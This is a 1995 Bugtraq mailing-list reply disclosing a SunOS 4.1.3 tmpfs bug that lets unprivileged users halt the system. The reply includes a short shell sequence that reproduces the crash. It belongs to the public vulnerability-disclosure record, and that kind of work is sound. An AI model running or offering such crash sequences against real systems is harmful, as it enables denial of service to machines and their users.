Bugtraq mailing list archives
Re: Another tmpfs bug in SunOS 4
From: shipley () dis org (Pete Shipley)
Date: Thu, 7 Dec 1995 16:06:06 -0800
Hi! Unprivileged users can crash the system such that a power down power up cyle is needed. Vulnerable OS is (at least) SunOS 4.1.3. With the right permissions (umask) the following sequence crahes the system. The kernel does not panic, nor the abort sequece enters the boot promt, the system is halted, need to power down.
yea this is the same as:
mkdir /tmp/foo
cd /tmp/foo
chmod 555 .
ln /etc/motd .
-Pete
Current thread:
- Cracked: WINDOWS.PWL Michael S. Fischer (Dec 05)
- Another tmpfs bug in SunOS 4 Arfst Ludwig (Dec 02)
- Re: Another tmpfs bug in SunOS 4 Pete Shipley (Dec 07)
- little whole on Suns concerning /dev/kbd Arfst Ludwig (Dec 02)
- Re: little whole on Suns concerning /dev/kbd Pete Shipley (Dec 07)
- Re: Cracked: WINDOWS.PWL [most services accessed by any version Rich Graves (Dec 05)
- fork() Alex Leipold (Dec 10)
- Re: fork() Scott Barman (Dec 11)
- Re: fork() Tom Jones (Dec 12)
- SECURITY: Announcing Splitvt 1.6.3 Sam Lantinga (Dec 13)
- Re: SECURITY: Announcing Splitvt 1.6.3 Alex Leipold (Dec 14)
- Re: fork() Scott Barman (Dec 11)
- Re: fork() JaDe (Dec 11)
- Re: fork() Nathan Lawson (Dec 11)
- Another tmpfs bug in SunOS 4 Arfst Ludwig (Dec 02)